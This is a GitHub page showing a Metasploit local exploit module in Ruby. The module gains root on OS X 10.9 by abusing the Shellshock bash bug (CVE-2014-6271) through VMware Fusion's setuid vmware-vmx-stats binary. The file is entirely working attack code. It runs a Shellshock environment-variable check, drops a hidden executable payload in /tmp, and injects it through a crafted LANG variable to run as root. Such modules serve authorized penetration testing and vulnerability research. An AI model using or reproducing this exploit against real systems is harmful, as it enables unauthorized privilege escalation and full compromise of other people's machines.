-
Notifications
You must be signed in to change notification settings - Fork 14.8k
Expand file tree
/
Copy pathvmware_bash_function_root.rb
More file actions
111 lines (98 loc) · 3.33 KB
/
vmware_bash_function_root.rb
File metadata and controls
111 lines (98 loc) · 3.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets the VMWare Fusion
application, allowing an unprivileged local user to get root access.
},
'License' => MSF_LICENSE,
'Author' => [
'Stephane Chazelas', # discovered the bash bug
'juken', # discovered the VMWare priv esc
'joev', # msf module
'mubix' # vmware-vmx-stats
],
'References' => [
[ 'CVE', '2014-6271' ],
[ 'CWE', '94' ],
[ 'OSVDB', '112004' ],
[ 'EDB', '34765' ]
],
'Platform' => 'osx',
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[
'Mac OS X 10.9 Mavericks x64 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X64
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2014-09-24',
'Notes' => {
'AKA' => ['Shellshock'],
'Stability' => UNKNOWN_STABILITY,
'Reliability' => UNKNOWN_RELIABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
register_options [
OptString.new('VMWARE_PATH', [true, 'The path to VMware.app', '/Applications/VMware Fusion.app']),
]
register_advanced_options [
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
register_file_for_cleanup path
end
def check
check_str = Rex::Text.rand_text_alphanumeric(5)
# ensure they are vulnerable to bash env variable bug
if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
if check != CheckCode::Vulnerable
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_file = "#{base_dir}/.#{Rex::Text.rand_text_alpha_lower(8..12)}"
exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload payload_file, exe
cmd_exec "chmod +x #{payload_file}"
print_status 'Running VMWare services...'
path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
end
end